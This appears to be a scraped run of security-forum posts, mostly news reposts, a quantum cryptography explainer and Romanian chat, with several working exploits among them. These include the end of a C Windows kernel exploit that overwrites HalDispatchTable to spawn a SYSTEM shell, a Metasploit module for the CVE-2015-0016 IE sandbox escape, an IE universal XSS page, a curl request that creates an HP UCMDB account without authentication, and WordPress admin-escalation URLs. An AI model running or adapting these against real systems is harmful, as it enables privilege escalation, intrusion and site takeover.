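        printf("[-] VirtualAlloc allocation failure %.8x\n\n", (unsigned int)GetLastError());
        return -1;
    }
    printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", (unsigned int)(ULONG_PTR)addrtoshell);

    /* NOP sled fill, then the payload at the start of the page. */
    memset(addrtoshell, 0x90, BUFSIZE);
    memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
    printf("[i] Size of shellcode %d bytes\n", (int)sizeof(token_steal_xp));

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, (int)GetLastError());
        return -1;
    }
    printf("[+] Open %s device successful\n", devhandle);

    /* Never send the write with an unresolved target: that is a guaranteed bugcheck. */
    HalDispatchTable = HalDispatchTableAddress();
    if (HalDispatchTable == 0) {
        printf("[-] HalDispatchTable not resolved, nothing sent\n\n");
        CloseHandle(hDevice);
        return -1;
    }
    HalDispatchTableTarget = HalDispatchTable + sizeof(DWORD);
    printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);

    input[0] = addrtoshell;   // input buffer contents gets written to our output buffer address
    printf("[+] Input buffer contents %08x\n", (unsigned int)(ULONG_PTR)input[0]);
    printf("[~] Press any key to send Exploit . . .\n");
    getch();

    ok = DeviceIoControl(hDevice, 0x830020f8, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
    printf("[+] Buffer sent\n");
    if (!ok) {
        /* The posted listing ignored this; whether the kernel write happened anyway is unknown. */
        printf("[!] DeviceIoControl returned failure (%d), continuing as the original did\n", (int)GetLastError());
    }

    printf("[+] Spawning SYSTEM Shell\n");
    NtQueryIntervalProfile(2, &time);   /* reaches the kernel through HalDispatchTable+4 -> payload */
    spawnShell();

    printf("[+] Restoring Hal dispatch table pointers\n\n");
    ok = DeviceIoControl(hDevice, 0x830020f8, restore_pointers_xp, sizeof(restore_pointers_xp) - 1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
    if (!ok) {
        printf("[!] Restore write failed (%d): HalDispatchTable may still be clobbered, expect instability\n\n", (int)GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}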
  3. “Quantum cryptography uses photons and physics to generate cryptographic keys” What is quantum cryptography? Quantum cryptography is NOT a new algorithm to encrypt and decrypt data. Rather it is a technique of using photons to generate a cryptographic key and transmit it to a receiver using a suitable communication channel. A cryptographic key plays the most important role in cryptography; it is used to encrypt/decrypt data. Types of cryptography There are two types of cryptography: Symmetric Cryptography Asymmetric Cryptography Symmetric Key Cryptography is also known as Secret Key Cryptography (SKC) where a key (any text, numbers, etc.) is used to encrypt data, and the same key is used to decrypt that data. The smallest change in the secret key will fail to decrypt an encrypted message. For example, text that is encrypted using AES encryption with key Infosec will fail to decrypt another cipher text which was encrypted using key INFOSEC. Asymmetric Key Cryptography is also known as Public Key Cryptography (PKC) where two sets of keys are generated. One is called a public key and other is called a private key. A public key is used to encrypt data whereas a private key is used to decrypt that data. Similar to symmetric cryptography, the smallest change in any of the two keys will make them useless to get the original data. A benefit of asymmetric cryptography is that you can share the public key with the whole world so that they can use it to send you encrypted data. And the private key is stored safely with the owner and is used for decryption. One disadvantage of this type of cryptography is that if your private key is lost or leaked then you will have to generate a new pair of public and private keys. Why do we need quantum cryptography? Every new solution is made because of some problem we have with the current solution. The case is no different with this one. Let us see the problem first. 
The problem with symmetric cryptography is that the same key is used to both encrypt and decrypt the messages. If for some reason that key is leaked to some third party, then it can be used to decrypt communication between two trusted devices or persons. In the worst case, the communication can be intercepted and altered. Raw computing power is not the threat here: a home Xbox or PlayStation, or even a supercomputer, cannot brute-force a properly sized symmetric key such as AES-128; computing power only breaks symmetric keys that are short, weak, or derived from guessable passwords. Another major problem with this type of cryptography is how to decide which key to use and how to share it between trusted devices or persons. Imagine a key has to be shared between India and America; then that communication too has to be secured before sharing the key. Coming to the problem of asymmetric cryptography, it is not something we are facing right now, but seeing the pace of changing technology, we may be facing it soon. Public keys in common use (for example 2048-bit RSA or 256-bit elliptic-curve keys, each offering roughly 112 to 128 bits of security) are considered very strong. An attacker can easily get hold of the public key because it is shared by the user. But deriving the private key from the public key means solving a hard mathematical problem (integer factoring or discrete logarithms), which for these key sizes would take a classical supercomputer far longer than its lifetime. With a sufficiently large quantum computer, however, Shor's algorithm solves both problems efficiently, and that is what would break today's public-key cryptography. Quantum computers so far exist only as small experimental devices; a machine large enough to run Shor's algorithm against real key sizes has not been built. Moore's Law observes that the number of transistors in an integrated circuit doubles roughly every two years (a current Intel i7 has about 1.4 billion), and classical computing power keeps growing with it, but this trend concerns classical hardware and does not by itself bring quantum computers closer, since those rely on a different physical technology.
Clearly, in the coming decades computing power will keep increasing, and large quantum computers may well become a reality. From the above discussion it is clear that the biggest problem with the current cryptographic techniques is the keys and their security in transmission. How does quantum cryptography work? In quantum cryptography (more precisely quantum key distribution, QKD), the source sends a key to the receiver using quantum states, and this key is then used with an ordinary symmetric cipher (ideally a one-time pad) to encrypt and decrypt the messages that follow. When the key has been successfully sent and received, the next step is to send encrypted data to the receiver and let it decrypt and process that data. Important: the key is the main part of cryptography and should be sent in a very secure manner. Quantum cryptography has a different way of sending the key to the receiver. It uses photons to send a key. What is a photon, and how is it used? A photon is the smallest particle of light. What matters here is its polarization, which is measured in one of two bases: Rectilinear (horizontal or vertical) Diagonal (right or left diagonal) Until it is measured, a photon can be in a superposition of these polarizations; measuring it in one basis gives a definite result in that basis and destroys the information belonging to the other basis. How do we use it in cryptography? Polarization can be used to polarize (pass through a filter) a photon so that it has a particular orientation: vertical, horizontal or diagonal. Polarization of a photon is performed using polarization filters. Now comes the quantum measurement principle, usually introduced alongside Heisenberg's Uncertainty Principle: measuring a photon in the wrong basis yields a random result and changes the photon's state, and an unknown quantum state cannot be copied (the no-cloning theorem). In other words, if an eavesdropper intercepts the transmitted photons and passes them through her own polarizer, every wrong guess of the basis alters the photon the receiver gets, so the interception of the communication can be detected. It means that if a photon is polarized using say an X filter (Diagonal Polarization), then to read the original orientation of the photon only an X filter can be used.
If a + filter (Rectilinear Polarization) is used on a diagonally polarized photon, then it will either be absorbed by the filter or come out with a different orientation than the original photon. For example, a horizontally polarized photon passed through the diagonal filter comes out as left or right diagonal at random, so its original orientation is lost. The below table shows the output orientation for each polarization filter: Polarization Output Spin Rectilinear Polarization (+) Horizontal Spin (–) Vertical Spin (|) Diagonal Polarization (X) Left Diagonal Spin (\) Right Diagonal Spin (/) How to send data using photons One of the major concerns before using quantum cryptography is how to associate data with photons. This problem can be easily solved by assigning the orientation ("spin" in the tables) of every photon the value 0 or 1. Please see the sample table below: Spin Horizontal Spin (–) Vertical Spin (|) Left Diagonal Spin (\) Right Diagonal Spin (/) Value 0 1 0 1 Imagine Alice applies polarizations on photons, gets the orientation and keeps a note of it. Every orientation has a value associated with it. Please refer to the table below: Do note that Alice is able to find the orientation of a photon after polarization using four detectors (horizontal, vertical, right diagonal, left diagonal). Now the key in binary format is: 0101100110101011 This binary data can be converted into other formats like string and integer, depending upon the choice of the users involved in the communication. Let us assume Alice wants the key in integer format, so the key will be 22955 (0x59AB). In a real-world implementation the key must be far longer than this. How to share and verify the key In the above section, Alice applied polarization and calculated the value of the key, which will be transmitted to Bob. Note that transmission of these photons typically takes place over optical fiber. Alice sends the polarized photons to Bob using a suitable communication channel.
Bob is listening for incoming photons and randomly applies either polarization basis (rectilinear or diagonal) to each one, keeping a note of the applied polarization, the orientation measured and its bit value. Now when the transmission has completed, Alice and Bob communicate on a public channel which need not be encrypted but must be authenticated: if an attacker could impersonate Alice or Bob on this channel, he could sit in the middle of the whole exchange. Bob tells Alice only the polarizations (not the orientation or value) he applied, in exactly the same sequence, and Alice only says YES/NO. This communication will be something like this: In the above communication, Bob gets to know which of his polarizations were wrong. But do note that we have a problem here, highlighted in orange in the table: Alice said the polarization applied was wrong, yet the orientation Bob measured had the same bit value (1) as Alice's. Bob has no way to know what value Alice has, so he can only discard his results for every wrong polarization; keeping just the positions where both used the same basis is called sifting. After successful key transmission and removal of the wrongly measured bits, encrypted data can be sent and decrypted when received. Communication interception If a user is intercepting the communication between sender and receiver, then he will have to randomly apply a polarization to each photon sent. After measuring, he forwards a photon to the original receiver. But it is impossible for the eavesdropper to guess all polarizations correctly, and each wrong guess disturbs the photon he forwards. So when Alice and Bob compare polarizations and then check a sample of their sifted key bits over the public channel, an error rate above what the link normally shows reveals that the communication was intercepted, and the key is discarded. Conclusion Privacy and data security is right now of utmost importance to people. With quantum cryptography, secure key transmission is possible, and any attempt to intercept it can be detected rather than merely hoped against. This technology has been implemented in some areas, but it is still under deeper research before being widely implemented. Reference: How Quantum Cryptology Works - HowStuffWorks Source
  4. Aerosol

    Salut!

    @Xivo25 bine ai venit, tin sa precizez: "mna e site de hacking" ( NU, e Romanian SECURITY Team, nu Hacking) + incearca sa scrii corect. On:// Salut si bafta cu scoala!
  5. De ce sa fie "anonim" atata timp cat omul nu se ocupa cu nimic ilegal? bai ganditi si voi inainte sa scrieti ceva, sunt multi oameni de pe RST ce nu stau ascunsi. On:// Bun venit!
  6. Google is offering grants worth up to $3,000 to investigate suspected security flaws as a part of a new "experimental" initiative. Google security engineer Eduardo Vela Nava announced the move in a blog post, promising to offer further incentives for researchers to investigate suspected problems that they would otherwise ignore. "Today we're rolling out a new, experimental programme: Vulnerability Research Grants. These are upfront awards that we will provide to researchers before they ever submit a bug," he explained. "We'll publish different types of vulnerabilities, products and services for which we want to support research beyond our normal vulnerability rewards. "We'll award grants immediately before research begins, with no strings attached. Researchers then pursue the research they applied for, as usual. There will be various tiers of grants, with a maximum of $3,133.70." Google also announced plans to expand its existing bug bounty programme to include flaws in mobile applications. "Also starting today, all mobile applications officially developed by Google on Google Play and iTunes will now be within the scope of the Vulnerability Reward Programme," read the post. Google has been a constant supporter of bug bounty schemes, and announced reforms to its programmes in 2014. Google tripled Chrome bug bounty payments to $15,000 in October prior to launching the Project Zero initiative. Project Zero was launched in July 2014 with the apparent intention of speeding up companies' patch release schedules. The team of researchers does this by initially disclosing flaws privately to the firms responsible and giving them 90 days to release a fix before making the research public. The project was criticised earlier this year for the public disclosure of bugs in Microsoft's Windows and Apple's Mac OS X operating systems. Nava credited the schemes as a success despite the controversy. 
He revealed that Google paid researchers more than $1.5m for discovering over 500 bugs last year. Source
  7. Crypto pioneer Phil Zimmermann has labelled UK Prime Minister David Cameron’s anti-encryption plans as "absurd". Zimmermann, creator of the PGP email privacy package, countered Cameron's argument that encryption is creating a means for terrorists and child abusers to communicate in private, arguing instead that intelligence agencies such as GCHQ and the NSA have "never had it so good". Strong encryption technology is one of the few success stories in online security, according to the co-founder of secure communications firm Silent Circle. Cameron is pushing the idea of banning crypto products that UK spies are unable to access, an idea he first floated in a recent speech before lobbying US President Barack Obama on the issue. Unsurprisingly, Zimmermann is unimpressed with an anti-encryption policy the Conservative Party plans to write into its manifesto for the forthcoming UK general election. "It’s absurd," Zimmermann told The Guardian. "We fought the crypto wars in the 1990s, and that matter has been settled. End-to-end encryption is everywhere now: in browsers, online banking. If you have strong encryption between your web browser and your bank, you can’t have a man in the middle from the government wiretapping that." The FBI and intel agencies such as MI5 have been vocal in complaining that strong encryption technologies are paving the path toward a dark web where they will no longer be able to intercept terrorists' communications. Zimmermann said ubiquitous CCTV cameras and other technologies mean that spy agencies are enjoying a "golden age of surveillance" comparable with the world as depicted by TV show Person of Interest. "They can see everything: they’ve got face recognition algorithms looking through cameras on the streets, optical recognition cameras at bridges, tunnels and traffic lights," Zimmermann said. "They can track movements, transactions, who’s having lunch with whom, who’s sleeping with whom. They can see everything!" 
"To complain that end-to-end encryption is crippling them, well, it's like having a couple of missing pixels in a large display. They have the rest of the display! They’ve never had it so good. They didn’t have this stuff 20 years ago," he added. Cameron's anti-encryption policies would reduce the UK to the level of Colombia 10 years ago, when not even banks were allowed to use encryption, said Zimmermann, who addressed Colombian lawmakers debating the introduction of encryption at the time. "Not even banks! And the banks were getting robbed by hackers (accounts were getting cleaned out) because people like David Cameron who don’t like encryption said nobody could use it," he added. Rather than being fearful of encryption, the government should be encouraging enterprises to adopt it in order to safeguard privacy in cases where corporate systems are breached. Zimmermann hopes that more enterprises will take lessons from the Sony Pictures megahack and use it as a spur to kick ahead with encryption projects, an idea he explores in greater depth in a post on Silent Circle's blog. Source
  8. ADOBE FLASH IS VULNERABLE again, Adobe has warned. The company released a new security bulletin acknowledging a zero-day flaw in Flash Player which was exploited throughout January. Classified with a 'critical' severity rating, the CVE-2015-0313 flaw affects Flash Player 16.0.0.296 and earlier versions on Windows and OS X machines. A successful exploitation "could cause a crash and potentially allow an attacker to take control of the affected system", Adobe warned. The company thanked security researchers from Microsoft and Trend Micro for reporting the flaw. The vulnerability is being exploited via drive-by download attacks against users of Internet Explorer and Firefox on Windows 8.1, Adobe said. Trend Micro said that the flaw has been exploited by cyber criminals with 'malvertising' campaigns that redirect visitors from a legitimate site to a malicious domain where the exploit is hosted. Using the ad-serving network allows the criminals to maximise the attack surface while spreading the infection automatically on vulnerable systems, the security firm explained. Most of those who accessed the malicious server in January were located in the US, Trend Micro said. The popular video sharing site Dailymotion was one site affected by the vulnerability. January was a busy period for Flash Player, with two critical flaws already discovered and patched by Adobe near the end of the month. The company said that a fixed version of Flash Player will be released this week. Andy Manoske of security company AlienVault said that Flash "is extremely prolific with something like ~20% penetration of all active websites on the web", and that there is "an incredible amount of scrutiny on Flash" from researchers and criminals. The software's complicated architecture isn't helpful in avoiding the discovery of new vulnerabilities, the researcher warned. Source
  9. If someone shares a porn video on Facebook, beware. The latest threat to users involves a fake Flash Player update which pops up during a preview of a pornographic video. Once you click on the link to update your video player, malware (the name given to malicious software), downloads onto your computer. This Trojan horse software gives the creator of the malware remote access to your computer. They can then download viruses onto your computer. Security researcher Mohammad Faghani alerted users to the threat in a post on the Full Disclosure blog, which flags up network vulnerabilities. "The Trojan tags the infected user's friends with an enticing post," he explained. Faghani warned that the malware then tags up to 20 friends of the victim in the malicious post, thus leading to a larger number of those who could be affected. He believes it could "infect more than 110,000 users in two days". Faghani also said the malware was able to hijack keyboard and mouse movement. In response, Facebook said it was aware of the problem and was working to block it. In a statement issued to security news website Threatpost, a Facebook spokesperson said: "We use a number of automated systems to identify potentially harmful links and stop them from spreading. "In this case, we're aware of these malware varieties, which are typically hosted as browser extensions and distributed using links on social media sites. "We are blocking links to these scams, offering cleanup options, and pursuing additional measures to ensure that people continue to have a safe experience on Facebook." Last week, a hacker group called Lizard Squad had hinted it was responsible for the Facebook, Instagram and Tinder going down. Facebook denied it was hacked, saying the access issues were "not the result of a third party attack". Source
  10. Update: Capstone 3.0.1 Changes: Release 3.0.1 is a stable version with important fixes in the core & Python bindings. Download
  11. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, { 'Name' => 'MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape', 'Description' => %q{ This module abuses a process creation policy in Internet Explorer's sandbox, specifically the Microsoft Remote Desktop Services Web Proxy IE one, which allows the attacker to escape the Protected Mode, and execute code with Medium Integrity. At the moment, this module only bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This module has been tested successfully on Windows 7 SP1 (32 bits) with IE 8 and IE 11. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # From Threat Intel of Symantec 'Henry Li', # Public vulnerability analysis 'juan vazquez' # Metasploit module ], 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'Arch' => [ARCH_X86], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'WfsDelay' => 30 }, 'Targets' => [ [ 'Protected Mode (Windows 7) / 32 bits', { 'Arch' => ARCH_X86 } ] ], 'DefaultTarget' => 0, 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2015-0016'], ['MSB', 'MS15-004'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/'] ], 'DisclosureDate' => 'Jan 13 2015' })) end def check temp = get_env('WINDIR') dll_path = "#{temp}\\System32\\TSWbPrxy.exe" win_ver = sysinfo['OS'] unless win_ver =~ /Windows Vista|Windows 2008|Windows 2012|Windows [78]/ return Exploit::CheckCode::Safe end unless file_exist?(dll_path) return Exploit::CheckCode::Safe end Exploit::CheckCode::Detected end def exploit print_status('Checking target...') unless check == Exploit::CheckCode::Detected 
fail_with(Failure::NotVulnerable, 'System not vulnerable') end if session.platform !~ /^x86\// fail_with(Failure::NotVulnerable, 'Sorry, this module currently only allows x86/win32 sessions at the moment') end win_ver = sysinfo['OS'] if win_ver =~ /Windows 2012|Windows 8/ fail_with(Failure::NotVulnerable, 'This module doesn\'t run on Windows 8/2012 at the moment') end print_status('Checking the Process Integrity Level...') unless get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NotVulnerable, 'Not running at Low Integrity') end cmd = cmd_psh_payload( payload.encoded, payload_instance.arch.first, { :remove_comspec => true } ) print_status('Storing payload on environment variable...') cmd.gsub!('powershell.exe ','') session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', cmd) print_status('Exploiting...') temp = get_env('TEMP') # Using the old meterpreter loader, if it's loaded with # Reflective DLL Injection the exceptions in the sandbox # policy won't apply. session.core.load_library( 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0016', 'cve-2015-0016.dll'), 'TargetFilePath' => temp + '\\cve-2015-0016.dll', 'UploadLibrary' => true, 'Extension' => false, 'SaveToDisk' => false ) end def cleanup session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', nil) super end end Source
  12. <title>insider3show</title> <body style="font-family:Georgia;"> <h1>insider3show</h1> <iframe style="display:none;" width=300 height=300 id=i name=i src="1.php"></iframe><br> <iframe width=300 height=100 frameBorder=0 src="http://www.dailymail.co.uk/robots.txt"></iframe><br> <script> function go() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1); } setTimeout("go()",1000); </script> <b>Summary</b><br> An Internet Explorer vulnerability is shown here:<br> Content of dailymail.co.uk can be changed by external domain.<br> <br> <b>How To Use</b><br> 1. Close the popup window("confirm" dialog) after three seconds.<br> 2. Click "Go".<br> 3. 
After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.<br> <br> <b>Screenshot</b><br> <a href="screenshot.png">screenshot.png</a><br> <br> <b>Technical Details</b><br> Vulnerability: Universal Cross Site Scripting(XSS)<br> Impact: Same Origin Policy(SOP) is completely bypassed<br> Attack: Attackers can steal anything from another domain, and inject anything into another domain<br> Tested: Jan/29/2015 Internet Explorer 11 Windows 7<br> <br> <h1><a href="http://www.deusen.co.uk/">www.deusen.co.uk</a></h1><script type="text/javascript"> //<![CDATA[ try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"6e87366c9054a61c3c7f1d71c9cfb464",petok:"0fad4629f14e9e2e51da3427556c8e191894b109-1422897396-1800",zone:"deusen.co.uk",rocket:"0",apps:{}}];CloudFlare.push({"apps":{"ape":"9e0d475915b2fa34aea396c09e17a7eb"}});!function(a,{a=document.createElement("script"),b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=919620257c/cloudflare.min.js",b.parentNode.insertBefore(a,}()}}catch(e){}; //]]> </script> Source
  13. Mogwai Security Advisory MSA-2015-02 ---------------------------------------------------------------------- Title: Hewlett-Packard UCMDB - JMX-Console Authentication Bypass CVE-ID: CVE-2014-7883 Product: Hewlett-Packard Universal CMDB (UCMDB) Affected versions: UCMDB 10.10 (Other versions might also be affected) Impact: high Remote: yes Product link: http://www8.hp.com/us/en/software-solutions/configuration-management-system-database/index.html Reported: 14/11/2014 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: ---------------------------------------------------------------------- The HP Universal CMDB (UCMDB) automatically collects and manages accurate and current business service definitions, associated infrastructure relationships and detailed information on the assets, and is a central component in many of the key processes in your IT organization, such as change management, asset management, service management, and business service management. The UCMDB ensures that these processes can rely on comprehensive and true data for all business services. Together with HP UCMDB Configuration Manager (UCMDB-CM) you can standardize your IT environments, and make sure they comply with clear policies, and defined authorization process. Many IT organizations turn to a CMDB and configuration management processes to create a shared single version of truth to support business service management, IT service management, change management, and asset management initiatives. These initiatives help align IT efforts with business requirements and run IT operations more efficiently and effectively. The initiatives success depends on the CMDB providing a complete view into the configuration items (CIs) and assets as well as how various IT elements relate together to deliver the business service. 
----------------------------------------------------------------------- Business recommendation: ----------------------------------------------------------------------- Apply configuration changes from HP https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsearch/document/KM01351169 -- CVSS2 Ratings ------------------------------------------------------ CVSS Base Score: 6.4 Impact Subscore: 4.9 Exploitability Subscore: 10 CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N) ----------------------------------------------------------------------- Vulnerability description: ---------------------------------------------------------------------- UCMDB administrators heavily rely on a JMX-Console, which is installed by default. The JMX-Console web application in UCMDB performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method (for example HEAD). The web.xml file of the JMX Console contains the following security constraints: <security-constraint> <web-resource-collection> <web-resource-name>Protected Pages</web-resource-name> <url-pattern>/*</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <auth-constraint> <role-name>sysadmin</role-name> </auth-constraint> </security-constraint> <security-constraint> <web-resource-collection> <web-resource-name>Callhome Servlet</web-resource-name> <url-pattern>/callhome</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> </security-constraint> This vulnerability is identical to CVE-2010-0738 (JBoss JMX-Console Authentication bypass). This can be used to create a new account which can then be used to access the JMX console. 
Proof of concept: ---------------------------------------------------------------------- The following Curl command will send a HEAD request to create a new user "pocuser" in the UCMDB Backend: curl -I "http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser" Disclosure timeline: ---------------------------------------------------------------------- 14/11/2014: Reporting issue to HP 18/11/2014: Re-Reporting, as no acknowledge received 18/11/2014: Acknowledge from HP 02/01/2015: Requesting status update from HP 29/01/2015: Requesting status update from HP 31/01/2015: Response from HP, they plan to release the advisory next week 02/05/2015: HP releases security bulletin 03/05/2015: Mogwai security bulletin release Advisory URL: ---------------------------------------------------------------------- https://www.mogwaisecurity.de/#lab References: ---------------------------------------------------------------------- Official HP security bulletin https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04553906 ---------------------------------------------------------------------- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) info@mogwaisecurity.de Source
  14. ------------------------------------------------------------------------------ WordPress Quasar Theme Privilege Escalation ------------------------------------------------------------------------------ [-] Theme Link: http://themeforest.net/item/quasar-wordpress-theme-with-animation-builder/6126939?ref=XanderRock [-] Affected Version: Version 1.9.1 [-] Vulnerability Description: The vulnerable code is located in the /rock-builder/rock-builder-ui.php script: function rock_builder_save_template(){ $data = $_REQUEST['data']; $template = $_REQUEST['template']; $templateName = $template['name']; $templateDBName = $template['database_name']; update_option($templateDBName, $data); $builderReferences = get_option("rock_builder_references",array()); $i = 0; foreach($builderReferences as $ref){ if($ref['database_name'] == $templateDBName){ $builderReferences[$i]['name'] = $templateName; update_option("rock_builder_references",$builderReferences); //echo "FOUND"; break; } $i++; } exit; } add_action("wp_ajax_rockAjax_save_builder_template","rock_builder_save_template"); The function rock_builder_save_template can therefore be called and executed by any logged-in user, which can lead to modifying WordPress settings and adding a new administrator, which may result in a full site takeover. [-] Proof of Concept: Accessing the URL below with a logged-in user will set the default role of any newly registered user to administrator (if you already had a user) http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=administrator&template[database_name]=default_role Accessing the URL below with a logged-in user will allow user registration if it was disabled; this can be exploited by sending it to a logged-in user or administrator (CSRF) http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=1&template[database_name]=users_can_register Source
  15. E destul de veche dar se mai practica. Totusi cum poti avea incredere intr-un tip ce iti spune: ,,Boss/Manca-ti-as vrei ceva iaftin?" Iti dai seama ca nimeni nu vine la tine sa te ajute.
  16. @euintreb daca ii vei injura pe cei de la romtelecom( noul Telekom ) nu vei rezolva nimic poate doar te vor ,,arde" si mai mult cel mai bine e sa ii suni inca o data si sa fi calm.
  17. http://m.youtube.com/?#/watch?v=Y7DmMIGu1HE
  18. Description Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka "GHOST." The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control of the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue. Qualys security researchers discovered this bug and worked closely with Linux distribution vendors. And as a result of that we are releasing this advisory today as a coordinated effort, and patches for all distributions are available January 27, 2015. Read more: http://dl.packetstormsecurity.net/papers/general/securing-ghost.pdf
  19. A privacy hole in WhatsApp allowed anyone to view someone else's profile photo – even if a user had configured the mobile messenger app to only show their pic to their contacts. The privacy slip-up, which came with the debut of WhatsApp’s newly-introduced web interface at web.whatsapp.com, was discovered by 17-year-old security researcher Indrajeet Bhuyan. The service was designed to allow users to chat with WhatsApp contacts through a browser, potentially on a PC or laptop. Privacy settings applied on the mobile app were apparently not carried over onto the browser-based version of the technology, launched just days ago and only available through Google's Chrome browser. On the smartphone side, you can only use the functionality on Android, BlackBerry and Windows Mobile since there's no iOS version at this nascent stage. There's no suggestion that messages themselves were exposed. Only profile pictures were viewable to world+dog. A second issue, also discovered by the enterprisingly precocious Bhuyan, means that deleted photos are still viewable through the web client even though they appeared as blurred if deleted when accessed through mobile versions of the software. In both cases you'd need to be logged in to see pictures in the trash, blurred or otherwise. This issue apparently stems from glitches in syncing functionality. It's unclear if and when the web version of WhatsApp will be updated to iron out these security glitches. WhatsApp recently introduced end-to-end encryption to better secure users’ messages, much to the chagrin of UK politicians such as David Cameron. Bhuyan, who had previously discovered a way to crash WhatsApp on users’ phones simply by sending a specially crafted message, has put together videos illustrating the "WhatsApp web photo privacy bug" (here) and the photo sync bug (here). 
Security veteran Graham Cluley said even though no sensitive data had actually been exposed, the teenager was right to call WhatsApp out on the latest issues he's managed to uncover. "Sure, it’s not the most serious privacy breach that has ever occurred, but that’s missing the point," Cluley explained in a blog post. "The fact of the matter is that WhatsApp users chose to keep their profile photos private, and their expectation is that WhatsApp will honour their choices and only allow their photos to be viewable by those who the user has approved." Source
  20. Topface, one of the world's largest dating websites, said it has paid a hacker an undisclosed sum to stop trying to sell about 20 million email addresses stolen from the Russian company. Topface Chief Executive Dmitry Filatov said the company located the hacker, who had published ads to sell the data but had not actually sold them. "We have paid him an award for finding a vulnerability and agreed on further cooperation in the field of data security," Filatov said in an email on Friday, declining to disclose the size of the reward. Topface says it has some 92 million users and 1.6 million daily visitors. Cybersecurity experts typically advise companies not to pay hackers to return stolen data, calling that a ransom and saying cybercriminals often break promises. But Filatov noted that the ads have already been removed and Topface has agreed not to pursue charges against the unidentified individual. "As we made an agreement with him we do not see any reason for him to break it," said Filatov. Atlanta-based fraud protection firm Easy Solutions disclosed the hack on Sunday, reporting on its blog that a hacker known as "Mastermind" was attempting to sell 20 million credentials from an unnamed dating site. Only email addresses had been stolen, Filatov said. "There was no access to other information - neither passwords, nor content of the accounts." Source
  21. After being disrupted by law enforcement in December 2013, the peer-to-peer (P2P) ZeroAccess botnet – also known as Sirefef – has resumed advertising click fraud activities, according to the Dell SecureWorks Counter Threat Unit (CTU). The team first noticed the botnet reactivating from March 21, 2014, to July 2, 2014, and then on Jan. 15 it started to distribute click-fraud templates to compromised systems, a Wednesday post indicates, noting that the botnet is made up of hosts from previous compromises and there have been no observed attempts to expand the botnet. Currently, the ZeroAccess botnet's infection base is around 55,000 systems, which is considerably lower than the reported two million systems that were infected when the botnet was taken down at the end of 2013, Jeff Williams, director of security strategy with the Dell SecureWorks CTU, told SCMagazine.com on Friday. “The current campaign may be small by design [perhaps in order to] evade detection, and it may be largely outside of the United States and Europe as a method to avoid those law enforcement agencies which were involved in the takedown operation (FBI in the U.S. and EC3 in Europe),” Williams said. According to a geographic distribution of ZeroAccess botnet peers included in the post, Japan has 15,322 hosts, or 27.7 percent 